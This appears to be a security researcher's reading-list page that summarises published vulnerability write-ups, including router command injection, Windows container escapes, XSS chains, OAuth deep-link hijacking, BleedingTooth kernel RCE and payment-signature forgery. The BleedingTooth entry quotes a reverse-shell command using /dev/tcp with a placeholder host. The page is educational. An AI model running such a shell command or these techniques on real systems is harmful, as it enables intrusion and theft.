Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Cisco RV34X Series – Authentication Bypass and Remote Command Execution- 453

IoT Inspector    Reference →Posted 4 Years Ago
  • This router used to have NO authentication on the file upload functionality on upload.cgi. So, upon fixing this, everything appeared to be okay...
  • However, the Nginx configuration literally just checks that the authorization header is not NULL. So, passes in any authorization header works just fine. Now, there is an authorization bypass in the file upload functionality. Sometimes, bugs are that easy!
  • The cookies field has a command injection when making a call to cURL. So, crafting a malicious cookie (without semi-colons) combined with the authentication bypass above allows for remote compromise of the device. Easy!

Who Contains the Containers? - 452

James Forshaw - Project Zero (P0)    Reference →Posted 4 Years Ago
  • Windows 10 added support for application containerization. It is quite similar to how containerization is done on Linux but wild different. While Docker on Windows works quite well, the implementation details for containers are abstracted away and not well-documented (besides onMSDN. This article is an overview of Windows containerization primitives and four bugs found along the way.
  • The goal of containers is to hide the real OS from the application. On Windows, the Server Silo is allows the redirection of resources such as the object manager, registry and networking. This is a special type of Job object.
  • There are two types of containers on Windows: Windows Server Containers and Hyper-V Isolated Containers. The difference is that the Hyper-V version runs in a lightweight VM under the hypervisor. The current specs say that only the Hyper-V container type has security promises, even though they are both containers.
  • The author wanted to crate their own container and understand what was going on. Luckily, Microsoft has a simple Go client and Windows Docker images are existing as well. After setting up a nice testing environment, it was time to find some vulns!
  • As the ContainerUser, the author wanted to see the permissions of this user. Although the groups did not seem interesting, the user had the SeImpersonatePrivilege! This permission allows this user to become any other user, including admin. This is a good (even bad?) start to the research.
  • The second bug was a registry key issue. By using relative opens for registries, it was ignoring the registry overlays. So, a non-administrative user could access user keys on the host if the user can pass the access key check.
  • Another issue was found with the registry keys and symbolic links. When accessing a symbolic link in a hive (grouping of registry keys), a kernel component should reject using the symbolic link or verify the ownership of the location. However, the function PsIsCurrentThreadInServerSilo will essentially always return TRUE. This appears to be something done in the testing phase that was never fixed.
  • Using the above bug, an attacker can use a kernel component to write to an arbitrary registry key. This could be used to escalate permissions within the container to cause major damage.
  • The final bug results from a discrepancy between application and server silos. With Linux, the syscall chroot can change the root directory for a user. In Windows land, a similar concept can be used to isolate an object manager namespace for users.
  • When attempting to find the right silo for the container, it does NOT validate which type of silo it is. Because an application silo can be created by any user, this is really bad. In order to perform this attack, simple create an application silo and assign this silo to a process. Now, the silo manager will use this malicious silo as if it was on the host machine.
  • Because the namespace has been put onto the actual root location, data can be accessed on the host through the object manager. Damn, such a simple mistake led to such a horrible outcome!
  • Putting all of these bugs together, it is possible to write content to the root of the hosts system drive. In particular, James uses the impersonation bug with the namespace bug to write to the host OS.

Rocket.chat XSS- 451

Maik Stegemann    Reference →Posted 4 Years Ago
  • Rocket.chat is an open source team chat platform. Probably something similar to Slack or Chime.
  • The chat had a piece of functionality that was looking for links then created an HTML link by adding an anchor tag with a library called AutoLinker. However, rocket.chat also supports markdown that interprets links.
  • By getting the AutoLinker to parse the link first, then getting the Markdown to parse THIS link, the context of the HTML is messed up. The Markdown library does not expect does already parsed links to be passed in.
  • By using this bug with a specially crafted link, this can be turned into arbitrary JavaScript via some funky HTML tag usage. The XSS can be used for a complete account takeover. Stored XSS is the worst.
  • There is no bug with AutoLinker or the Markdown library. However, by using both of them together, it created a serious security issue. This is a super interesting finding and not something that I would have thought of.

Chaining bugs to takeover Wind Vision accounts- 450

Leonidas Tsaousis    Reference →Posted 4 Years Ago
  • Wind Vision is a digital television service in Greece. All digital content is received via IP networks and it aims to be a next generation TV system. Because of this, the phone app is quite popular with over 50K downloads for Android.
  • What initially caught the researchers eye was the login flow. To login, the application opens a browser tab. If the credentials are correct, the user is logged in and the user would be navigated back to the application using deep links. There is a nice gif of the flow of the site.
  • A Deep Link is a way to create your own URL scheme in order for an application. There are also App Links which are mostly the same. The main difference is that a deep link can only be opened by the designated app and there is a validation done at installation time to ensure this. Normally, an application wants to restrict who can all this endpoint and wants to restrict who can use the URL.
  • By double registering a URL handler on a different application, the user MUST chose which one to go to. Because we are good social engineers, they will go to the malicious application.
  • Now, the authorization flow goes through the OAuth dance. Then, it sends the selected application an auth code. With control over the auth code, this can be turned into an Access Token quite easily! This could have been avoided if the OAuth2 with PKCE was used.
  • The author made an application to do exactly what we were talking about. Although this requires a malicious application to be downloaded and a bad click on the users part, this is still a really interesting finding! In the future, I will take the android:autoVerify="true" flag on an Android configuration more seriously.

BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution- 449

Google    Reference →Posted 4 Years Ago
  • Within Linux, there is a separate sub-system for dealing with bluetooth. The bluetooth chip communicates with the host OSS using the Host Controller Interface protocol.
  • While manually reviewing the HCI event packet parser, the author noticed that a length check had been removed for the HCI MAX length. From reviewing the path of this code, the usage of this assumes a maximum size validation because of the duplicate path for the regular and extended.
  • Because of this lack of bounds check into a static buffer (via a memcpy), a buffer overflow occurs. The size change from bluetooth 4.0 to 5.0 of 31 to 255 is the reason for this issue. So, this bug is only found in newer Bluetooth devices.
  • With this buffer overflow on the heap, we can fully control members of the hci_dev struct. With this, we control something else that contains a function pointer! Great, but now we need a leak. This bug was not used in the complete exploit.
  • Going through another section of the Bluetooth Linux stack, it is time for another bug! There is a bail out section if the AMP controller is invalid that fills out the id and status of a struct. However, the struct a2mp_info_rsp contains other fields.
  • Because the other fields are never initialized, 16 bytes of data from the attack can be routinely taken. In order to leak the right data, specific commands need to be sent in order to get data in the proper locations. However, this grooming just required some brute forcing in order to figure out.
  • While working on the memory leak, the author got a crash in the ERTM component. After tracing the code, the author realized that a type confusion was occurring when pointers were being passed around.
  • Exploiting the type confusion is tricky! Both objects have lots pointers: we must line these up in such a way that we alter what we want without crashing. This is a powerful primitive though.
  • The only member that we can reasonably corrupt is the sk->sk_filter pointer. However, the actual object being passed in is ONLY of size 0x70 and the offset is at 0x110. So, do we control this? With our current object, no. However, this looks prime for some heap grooming!
  • The author goes into how this heap grooming is done; an object of an arbitrary size can be controlled with arbitrary content! However, the details are specific to the sub-system so I will not cover them.
  • With the setup above, we have an arbitrary read primitive! We have the initial memory leak (uninitialized memory) and now we can dereference an arbitrary pointer that is read back to us. This dereferencing is handy for other things as well.
  • With control over the sk_filter value being dereferenced, we can control a function pointer! This function pointer has a parameter that we can directly pass into RSI (second) after two dereferences.
  • With NX, the author explains their exploit strategy. Because we are using the CALL instruction, we must first COP before we can ROP. The trick to this is to find a gadget that can put RSI (which we control) into the stack pointer to control further execution.
  • To get kernel execution with the new ROP chain, the author uses a known technique to pop a shell. This is done by running /bin/bash -c /bin/bash</dev/tcp/IP/PORT via the run_cmd function in the kernel.
  • Overall, this is an awesome article from bug discovery to complete compromise. The author was even kind enough to leave a POC for us to look at!

Eliminating Data Races in Firefox – A Technical Report- 448

Mozilla     Reference →Posted 4 Years Ago
  • Race conditions are a common bug in multi-thread and multi-process applications that are incredibly hard to track down. Using Thread Sanitizer the Mozilla essentially eliminated a bug class from Firefox! The Clang Thread Sanitizer is a tool that can help detect data races in C/C++ code by adding a significant amount of instrumentation.
  • Running this tool is no where near enough to figure out what is going on. The tool returns TWO types of races: Benign and Impactful. But, in reality, the classification is not sound. So, the Mozilla team decided to go with a no data race policy in order to have the best security.
  • At first, this seemed like a very large task. However, most of the fixes were trivial and/or improved code quality. So, this task was taken on by the Mozilla team!
  • While running through the Thread Sanitizer cases, they found some interesting issues. First, bitfields were a common spot were issues occurred for races and real world bugs. Because the fields are abstracted away and atomic operations are not the default, this bug occurred all over the place. They created an abstract atomic class to make this easier to fix.
  • An additional cause was code that was expected to be single threaded by was being used in a multi-threaded way. Of course, this yielded many bad bugs, especially in the configuration settings.
  • They have a mention of a Late-Validated Races. This is essentially a boolean checking for initialization then taking the Mutex if needed. However, if the data is initialized after this check by two different threads, it created undefined behavior. Instead, just write proper atomic code.
  • Even some Rust code had concurrency issues! The solution to these problems was to make the variables being accessed atomic.
  • Overall, the Thread Sanitizer looks like an amazing piece of software that can be used to find race conditions. In the future, I'll be using the whole bag of *SAN's to test my software.

What if you could deposit money into your Betting account for free?- 447

Mikey    Reference →Posted 4 Years Ago
  • Payment processors are an amazing attack surface! What if you could fake a transaction in some way or add money to an account? This is the holy grail of bugs, as it is directly leveraged to make money.
  • The author was looking for a way to exploit the usage of a payment processor in some application. They were looking for two things: a site that allowed the setting of a status_url and a weak protocol. They settled on the UK based payment provider Skrill because the security relied upon an MD5 hashed structure with only 10 characters as a nonce value.
  • With the ability to edit the location of the payment processor and the lack of entropy on the random values for the hash, the author cracked the nonce on the MD5 hash with a brute force script that took under 24 hours. With this cracked value, it was NOW possible to create our own signature to send data to the backend.
  • By having this value ready, we could create our own signed values from the payment provider. The author proceeded to make 25K appear into their gambling account! The dream!
  • Overall, this is an interesting article how several subtle oversights (and a crappy protocol) led to the arbitrary loading of money.

I Built a TV That Plays All of Your Private YouTube Videos- 446

David Shutz    Reference →Posted 4 Years Ago
  • While sharing a video marked private on Youtube, the author wondered HOW the smart TV could magically play the video. From there, the TV APIs were reversed and exploited.
  • The model for playing a video that is private works as such:
    1. TV checks for a command from polling
    2. YouTube API checks to see if the user sent anything. If the user sent something, then return that command.
    3. Run the command (returned from the YouTube API) that was given from the user.
  • The vulnerability is that the user request does NOT have any CSRF protections. So, by creating a fake website we can force the user to send a request to YouTube to bind a request for us for a TV. The author then had a register a minimalist TV for this to work (lolz).
  • The CSRF request, there was STILL one thing missing though: what private video? It turns out that the request can be used to get a playlist. Because the playlist ID is predictable per user, this allows for ALL private videos to be seen once this vulnerability was found.
  • Although this attack requires user interaction, this was an awesome bug discovery! I appreciate that harder to test functionality was done here; if it's easy to test, then everyone will test it.

This man thought opening a TXT file is fine, he thought wrong.- 445

Paulos Yibelo     Reference →Posted 4 Years Ago
  • TXT files are considered to be safe to open as they are plain files. Even most anti-virus solutions feel this way. So, getting TXT files to do bad things has massive impact.
  • On macOS the default text editor is TextEdit. For TXT files, the default is a RTF format instead of TXT, which allows customization's of the formatting. The author noticed that CSS and HTML were allowed.
  • macOS attempted to prevent any sort of exfiltration via TXT files. However, denylists are hard to implement properly! Any time there is a denylist instead of an allowlist, you have stumbled on good hunting grounds.
  • By using an iframedoc element, the TXT file can include local files; this appeared to be the only way to do this.
  • The next trick was to use dangling markup to exfiltrate the data. This was done by adding a style tag to a remote site with the iframedoc in the middle of it. Once the iframedoc loaded, the data would be sent in a URL (or something like that).

Breaking GitHub Private Pages for $35k- 444

Robert Chen    Reference →Posted 4 Years Ago
  • Github is the most popular location to store code. With the amount of features that Github offers, there is likely a plethora of bugs waiting to be discovered. On their Bug Bounty page, if you can read the flag of flag.private-org.github.io without user interaction (10K) or 5K with user interaction.
  • The first issue was a CRLF injection on a URL parameter being added to a cookie. Because newlines could be injected into the cookie value being appended, the HTTP headers could be manually altered. The trick for this was a NULLBYTE encoding in order for the integer to be parsed properly.
  • Using the bug above, XSS was possible and put onto the private page. Although this is impactful, there is a random nonce value that needs to be known as well.
  • To bypass the nonce check, the author decided to play. The __Host- prefix cookie flag is a security check that makes sure that cookies cannot be overwritten from different subdomains; this was included on the Nonce.
  • Because the author had code execution on the one page, they could set the cookies lower down on the subdomain chain. However, this is the exact attack that the __Host- prefix is meant to protect against!
  • The Github private pages server ignores capitalization and the browser does not! So, it was possible to overwrite the value of this cookie using a different named version of the cookie.
  • An additional bug was that the caching was done for the pages solely based upon the page id. Because of this, we could poison the response of the cache to perform an XSS whenever this page was viewed, without ever clicking on a link.
  • Most of these vulnerabilities were subtle issues A) people don't check for and B) do not seem relevant. Amazing writeup!